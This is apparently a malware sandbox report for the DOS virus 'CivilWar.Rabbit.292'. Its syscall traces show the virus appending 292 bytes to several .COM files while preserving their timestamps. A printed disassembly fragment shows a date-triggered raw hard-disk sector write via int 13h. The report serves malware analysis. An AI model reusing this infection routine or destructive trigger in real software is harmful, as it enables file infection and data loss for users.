Sample viewer

vx.netlux.org/Virus.DOS.CivilWar.Rabbit.292

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:04:27.023548466Z 26 PC: 12a5d | Set disk transfer address
2018-12-17T23:04:27.027992244Z 78 PC: 12a6b | Find first file
2018-12-17T23:04:27.037065179Z 61 PC: 12a81 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:04:27.044983501Z 87 PC: 12a88 | Get or set file date and time
2018-12-17T23:04:27.047025272Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:27.055923167Z 66 PC: 12aab | Move file pointer
2018-12-17T23:04:27.057856403Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-17T23:04:27.075553288Z 66 PC: 12ac6 | Move file pointer
2018-12-17T23:04:27.078763616Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:27.086621145Z 87 PC: 12adf | Get or set file date and time
2018-12-17T23:04:27.088760358Z 62 PC: 12ae3 | Close file
2018-12-17T23:04:27.099151392Z 79 PC: 12a6b | Find next file
2018-12-17T23:04:27.102575823Z 61 PC: 12a81 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:04:27.110170858Z 87 PC: 12a88 | Get or set file date and time
2018-12-17T23:04:27.113502184Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:27.121094604Z 66 PC: 12aab | Move file pointer
2018-12-17T23:04:27.123096028Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-17T23:04:27.127539636Z 66 PC: 12ac6 | Move file pointer
2018-12-17T23:04:27.129915615Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:27.133948239Z 87 PC: 12adf | Get or set file date and time
2018-12-17T23:04:27.135943392Z 62 PC: 12ae3 | Close file
2018-12-17T23:04:27.148087733Z 79 PC: 12a6b | Find next file
2018-12-17T23:04:27.151432044Z 61 PC: 12a81 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:04:27.160177913Z 87 PC: 12a88 | Get or set file date and time
2018-12-17T23:04:27.163246475Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:27.168602358Z 66 PC: 12aab | Move file pointer
2018-12-17T23:04:27.169972054Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-17T23:04:27.182151241Z 66 PC: 12ac6 | Move file pointer
2018-12-17T23:04:27.183468729Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:27.185640574Z 87 PC: 12adf | Get or set file date and time
2018-12-17T23:04:27.187299925Z 62 PC: 12ae3 | Close file
2018-12-17T23:04:27.195057816Z 79 PC: 12a6b | Find next file
2018-12-17T23:04:27.198595771Z 61 PC: 12a81 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:04:27.20755412Z 87 PC: 12a88 | Get or set file date and time
2018-12-17T23:04:27.211278265Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:27.2187992Z 66 PC: 12aab | Move file pointer
2018-12-17T23:04:27.220320171Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-17T23:04:27.224215317Z 66 PC: 12ac6 | Move file pointer
2018-12-17T23:04:27.226238913Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:27.229482523Z 87 PC: 12adf | Get or set file date and time
2018-12-17T23:04:27.232587664Z 62 PC: 12ae3 | Close file
2018-12-17T23:04:27.241577081Z 79 PC: 12a6b | Find next file
2018-12-17T23:04:27.244861299Z 61 PC: 12a81 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:04:27.253789671Z 87 PC: 12a88 | Get or set file date and time
2018-12-17T23:04:27.259415242Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:27.266685336Z 66 PC: 12aab | Move file pointer
2018-12-17T23:04:27.2687076Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-17T23:04:27.273149183Z 66 PC: 12ac6 | Move file pointer
2018-12-17T23:04:27.275131051Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:27.278459702Z 87 PC: 12adf | Get or set file date and time
2018-12-17T23:04:27.281612181Z 62 PC: 12ae3 | Close file
2018-12-17T23:04:27.298369659Z 79 PC: 12a6b | Find next file
2018-12-17T23:04:27.301595827Z 61 PC: 12a81 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:04:27.309951091Z 87 PC: 12a88 | Get or set file date and time
2018-12-17T23:04:27.31218343Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:27.319431052Z 66 PC: 12aab | Move file pointer
2018-12-17T23:04:27.322077018Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-17T23:04:27.336488043Z 66 PC: 12ac6 | Move file pointer
2018-12-17T23:04:27.338583905Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:27.346482391Z 87 PC: 12adf | Get or set file date and time
2018-12-17T23:04:27.34959211Z 62 PC: 12ae3 | Close file
2018-12-17T23:04:27.359105783Z 79 PC: 12a6b | Find next file
2018-12-17T23:04:27.36215576Z 61 PC: 12a81 | Open file (Filename = 'PAH.COM')
2018-12-17T23:04:27.37049814Z 87 PC: 12a88 | Get or set file date and time
2018-12-17T23:04:27.372865002Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:27.382923951Z 66 PC: 12aab | Move file pointer
2018-12-17T23:04:27.386024724Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-17T23:04:27.393072679Z 66 PC: 12ac6 | Move file pointer
2018-12-17T23:04:27.397168634Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:27.405788786Z 87 PC: 12adf | Get or set file date and time
2018-12-17T23:04:27.409914587Z 62 PC: 12ae3 | Close file
2018-12-17T23:04:27.426238939Z 79 PC: 12a6b | Find next file
2018-12-17T23:04:27.43433663Z 61 PC: 12a81 | Open file (Filename = 'TEST.COM')
2018-12-17T23:04:27.45005853Z 87 PC: 12a88 | Get or set file date and time
2018-12-17T23:04:27.452221118Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:27.455514893Z 66 PC: 12aab | Move file pointer
2018-12-17T23:04:27.458579367Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-17T23:04:27.467611164Z 66 PC: 12ac6 | Move file pointer
2018-12-17T23:04:27.469605355Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:27.478020873Z 87 PC: 12adf | Get or set file date and time
2018-12-17T23:04:27.480138636Z 62 PC: 12ae3 | Close file
2018-12-17T23:04:27.489985627Z 79 PC: 12a6b | Find next file
2018-12-17T23:04:27.493871876Z 59 PC: 12af4 | Change current directory
2018-12-17T23:04:27.498380025Z 42 PC: 12b01 | Get date 0x12b01: cmp dh, 4
0x12b04: jne 0x12b1a
0x12b06: cmp dl, 2
0x12b09: jne 0x12b1a
0x12b0b: mov ax, 0x301
0x12b0e: mov cx, 1
0x12b11: mov dx, 0x80
0x12b14: lea bx, word ptr [bp + 0x100]
0x12b18: int 0x13
0x12b1a: mov dx, 0x80
0x12b1d: mov ah, 0x1a
0x12b1f: int 0x21
0x12b21: mov di, 0x100
0x12b24: push di
0x12b25: ret
0x12b26: sub bp, word ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [0x2e], ch
0x12b2f: jmp 0x12c57
0x12b32: push si
2018-12-17T23:04:27.500655455Z 26 PC: 12b21 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14877,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.375371161Z 26 PC: 12a5d | Set disk transfer address
2018-12-25T12:41:56.377004551Z 78 PC: 12a6b | Find first file
2018-12-25T12:41:56.384387455Z 61 PC: 12a81 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.392086281Z 87 PC: 12a88 | Get or set file date and time
2018-12-25T12:41:56.394108099Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.403021305Z 66 PC: 12aab | Move file pointer
2018-12-25T12:41:56.404552191Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-25T12:41:56.416349514Z 66 PC: 12ac6 | Move file pointer
2018-12-25T12:41:56.426223014Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.433787146Z 87 PC: 12adf | Get or set file date and time
2018-12-25T12:41:56.435620646Z 62 PC: 12ae3 | Close file
2018-12-25T12:41:56.446359903Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.451289424Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.46568286Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.467895029Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.475199455Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.477534938Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.480738494Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.482667727Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.485606087Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.487290716Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.496859245Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.500444879Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.508191305Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.511205105Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.519340349Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.521469867Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.52659134Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.528268381Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.531280511Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.534121524Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.542391717Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.545655785Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.553856632Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.555918837Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.563217988Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.565541794Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.569453639Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.571054222Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.574017795Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.577154421Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.58594859Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.590762159Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.600277147Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.602684661Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.610023707Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.612777411Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.616579679Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.618480214Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.622043605Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.624921996Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.631186902Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.63441965Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.642796152Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.6445024Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.65182102Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.653913706Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.663395557Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.664774611Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.673811534Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.67613031Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.685372759Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.689476419Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.697272079Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.69888796Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.706506422Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.709194247Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.712566722Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.714471078Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.718364613Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.721895921Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.736931555Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.740775108Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.748384659Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.750302663Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.753650992Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.755319119Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.764545942Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.766682457Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.775808713Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.777519914Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.786313848Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.789408321Z 59 PC: 12af4 | Change current directory
2018-12-25T12:41:56.794138635Z 42 PC: 12b01 | Get date 0x12b01: cmp dh, 4
0x12b04: jne 0x12b1a
0x12b06: cmp dl, 2
0x12b09: jne 0x12b1a
0x12b0b: mov ax, 0x301
0x12b0e: mov cx, 1
0x12b11: mov dx, 0x80
0x12b14: lea bx, word ptr [bp + 0x100]
0x12b18: int 0x13
0x12b1a: mov dx, 0x80
0x12b1d: mov ah, 0x1a
0x12b1f: int 0x21
0x12b21: mov di, 0x100
0x12b24: push di
0x12b25: ret
0x12b26: sub bp, word ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [0x2e], ch
0x12b2f: jmp 0x12c57
0x12b32: push si
2018-12-25T12:41:56.797174324Z 26 PC: 12b21 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14877,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.464768221Z 26 PC: 12a5d | Set disk transfer address
2018-12-25T12:41:56.466472831Z 78 PC: 12a6b | Find first file
2018-12-25T12:41:56.474795924Z 61 PC: 12a81 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.482636156Z 87 PC: 12a88 | Get or set file date and time
2018-12-25T12:41:56.484643712Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.493444348Z 66 PC: 12aab | Move file pointer
2018-12-25T12:41:56.495470301Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-25T12:41:56.510504754Z 66 PC: 12ac6 | Move file pointer
2018-12-25T12:41:56.512426577Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.519789092Z 87 PC: 12adf | Get or set file date and time
2018-12-25T12:41:56.523497554Z 62 PC: 12ae3 | Close file
2018-12-25T12:41:56.534856862Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.537751898Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.546072855Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.547800764Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.556027202Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.557660041Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.562706929Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.565597239Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.573665948Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.575725738Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.590831592Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.594148242Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.601916181Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.604981295Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.612910465Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.615380406Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.619215932Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.621304125Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.624527656Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.626797747Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.636231818Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.639305588Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.646707496Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.654866897Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.662560737Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.664610427Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.669939426Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.672186355Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.675462877Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.677805473Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.685891848Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.688165002Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.694070692Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.695250482Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.700160253Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.704139364Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.706451164Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.707794267Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.710421089Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.711895669Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.717019085Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.71912243Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.723957888Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.725363664Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.72968452Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.731422572Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.737035863Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.738294151Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.744130727Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.745765488Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.751190436Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.759687851Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.768231215Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.769883044Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.778601917Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.781154205Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.784651305Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.786888238Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.79131807Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.793639353Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.799650557Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.817986397Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.825800349Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.827974172Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.832759072Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.835339372Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.845730191Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.849474651Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.857387566Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.868269829Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.881097623Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.885463926Z 59 PC: 12af4 | Change current directory
2018-12-25T12:41:56.890356136Z 42 PC: 12b01 | Get date 0x12b01: cmp dh, 4
0x12b04: jne 0x12b1a
0x12b06: cmp dl, 2
0x12b09: jne 0x12b1a
0x12b0b: mov ax, 0x301
0x12b0e: mov cx, 1
0x12b11: mov dx, 0x80
0x12b14: lea bx, word ptr [bp + 0x100]
0x12b18: int 0x13
0x12b1a: mov dx, 0x80
0x12b1d: mov ah, 0x1a
0x12b1f: int 0x21
0x12b21: mov di, 0x100
0x12b24: push di
0x12b25: ret
0x12b26: sub bp, word ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [0x2e], ch
0x12b2f: jmp 0x12c57
0x12b32: push si
2018-12-25T12:41:56.892937262Z 26 PC: 12b21 | Set disk transfer address

{"DateBased":true,"Day":2,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14877,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.750168795Z 26 PC: 12a5d | Set disk transfer address
2018-12-25T12:41:56.76192488Z 78 PC: 12a6b | Find first file
2018-12-25T12:41:56.76925135Z 61 PC: 12a81 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.77360638Z 87 PC: 12a88 | Get or set file date and time
2018-12-25T12:41:56.774823271Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.78193823Z 66 PC: 12aab | Move file pointer
2018-12-25T12:41:56.784453208Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-25T12:41:56.801164579Z 66 PC: 12ac6 | Move file pointer
2018-12-25T12:41:56.803735624Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.811807018Z 87 PC: 12adf | Get or set file date and time
2018-12-25T12:41:56.813918266Z 62 PC: 12ae3 | Close file
2018-12-25T12:41:56.824577886Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.829092983Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.83724506Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.839224537Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.851556252Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.853369269Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.856735908Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.862406308Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.865332017Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.869867493Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.879339745Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.882668384Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.890468249Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.893648381Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.91462594Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.916558979Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.92005217Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.923169314Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.931511489Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.935494984Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.946712491Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.95000193Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.957770146Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.961005572Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.968269123Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.969907569Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.973768208Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.975696201Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.979117298Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.982327141Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.991091715Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.99441947Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.002827304Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.00496256Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.016851846Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.018842516Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.023297854Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.025287935Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.028647223Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.031734644Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.040431465Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.043749763Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.051917519Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.054100428Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.068864558Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.093136485Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.108093069Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.110109291Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.132210636Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.136621092Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.145723355Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.149265881Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.157758909Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.15971977Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.167184934Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.170169313Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.173527898Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.175468852Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.179565473Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.182053623Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.190617405Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.194737684Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.20342725Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.205375974Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.208819126Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.211579538Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.220846985Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.222782519Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.231551044Z 87 PC: 12adf | Get or set file date and time (See above)
